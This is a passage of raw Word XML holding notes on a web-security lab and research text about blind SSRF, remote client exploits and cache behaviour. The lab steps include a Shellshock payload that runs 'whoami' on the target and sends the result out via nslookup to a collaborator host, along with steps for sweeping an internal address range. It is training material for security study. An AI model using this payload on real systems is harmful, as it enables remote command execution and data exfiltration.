          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Send the request to the product page to Burp Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B99421" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Use </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>Burp Collaborator client</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> to generate a unique Burp Collaborator payload, and place this into the following Shellshock payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>() { :; }; /usr/bin/nslookup $(whoami).YOUR-SUBDOMAIN-HERE.burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38746E8F" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Replace the User-Agent string in the Burp Intruder request with the Shellshock payload containing your Collaborator domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2431B" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "Clear §", change the Referer header to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://192.168.0.1:8080</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> then highlight the final octet of the IP address (the number </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>), click "Add §".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689556DF" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Switch to the Payloads tab, change the payload type to Numbers, and enter 1, 255, and 1 in the "From" and "To" and "Step" boxes respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443290B6" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "Start attack".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E67EF1" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>When the attack is finished, go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again, since the server-side command is executed asynchronously. You should see a DNS interaction that was initiated by the back-end system that was hit by the successful blind </w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>SSRF attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>. The name of the OS user should appear within the DNS subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0C1D0" w14:textId="77777777" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00010EA9" w:rsidP="00010EA9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>To complete the lab, enter the name of the OS user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEA49A0" w14:textId="3F12D8A3" w:rsidR="00010EA9" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="005222FB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Another avenue for exploiting blind SSRF vulnerabilities is to induce the application to connect to a system under the attacker's control, and return malicious responses to the HTTP client that makes the connection. If you can exploit a serious client-side vulnerability in the server's HTTP implementation, you might be able to achieve remote code execution within the application infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE2B8BA" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Remote client exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D57EFA" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In each of these cases, direct SSRF-style exploitation is extremely difficult as we receive no feedback from the application. One reaction to this is to spray the internal network with canned RCE payloads like the latest Struts2 exploit of the month, an approach somewhat reminiscent of lcamtuf's web crawler abuse in </w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Against the System: rise of the Robots</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. While entertaining, this technique isn't particularly interesting so I opted to shift focus to the client that's connecting to us. As with reverse proxies, such clients are often poorly audited and vulnerable to off-the-shelf </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>tools. I was able to steal memory from one server simply by making it establish a HTTPS connection to a server that performed the venerable client-heartbleed attack on connecting systems. Headless browsers like PhantomJS are typically outdated and missing numerous critical security patches. Windows based clients may volunteer up domain credentials to a server running SpiderLabs' </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Responder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and lcamtuf's </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>p0f</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> can uncover what the client is actually running behind the often-spoofed user-agent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59751AA1" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Although applications typically filter the URL input, many libraries transparently handle redirects and as such may exhibit completely different behavior on redirect URLs. For example, Tumblr's URL preview functionality only supports the HTTP protocol, but will happily follow redirects to FTP services. These techniques are likely to be complemented by some currently unreleased research by Orange Tsai focused on exploiting programming language's URL parsing and requesting libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B7C35" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Some clients were doing far more than simply downloading pages - they were actually rendering them and in some cases executing JavaScript within. This exposes an attack surface too expansive to map manually, so my colleague Gareth Heyes created a tool called 'Rendering Engine Hackability Probe' designed to thoroughly fingerprint the client's capabilities. As well as identifying common mishaps in custom browsers (like neglecting to enforce the Same Origin Policy) it flags unusual JavaScript properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2908C6" w14:textId="1760979C" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="text-center"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C7CDB8C" wp14:editId="17B50A80">
            <wp:extent cx="5943600" cy="4552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4552315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57424FCC" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>As we can see here, it has detected the unrecognized JavaScript properties 'parity' and 'System', which have been injected by the Parity browser to let websites initiate Ethereum transactions. Unrecognized parameters can range from mildly interesting to extremely useful. The 'parity' property can be used to get the users' wallet's public key, which is effectively a global unique identifier and also discloses their balance. JXBrowser let developers insert a JavaScript/Java bridge, and last year we discovered it was possible to exploit this to </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>escape the renderer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> and achieve arbitrary code execution. Ill-configured JavaScript-enabled clients may also connect to file:/// URLs, which can enable local file theft via malicious HTML stored in environment variables and displayed in /proc/self/environ - a sort of cross-protocol blind XSS vulnerability. As well as visually displaying results, every capability also triggers a server-side request so it's just as useful if you can't see the render output. The basic tests have been designed to work even on sensible clients that don't execute JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FC23F8" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="0" w:line="480" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Pre-emptive caching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCB949" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>While hunting for routing exploits, I noticed some bizarre behavior from a particular military server. Sending the following request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CF756" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET / HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Host: burpcollaborator.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F89ABEE" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="450" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Resulted in a normal response from the server, followed by several requests to the collaborator a few seconds later:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F95B5E1" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>GET /jquery.js HTTP/1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="single" w:sz="6" w:space="15" w:color="EAEAEA" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /abrams.jpg HTTP/1.1 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6F7292" w14:textId="77777777" w:rsidR="00D768DB" w:rsidRPr="00E4142C" w:rsidRDefault="00D768DB" w:rsidP="00D768DB">
      <w:pPr>
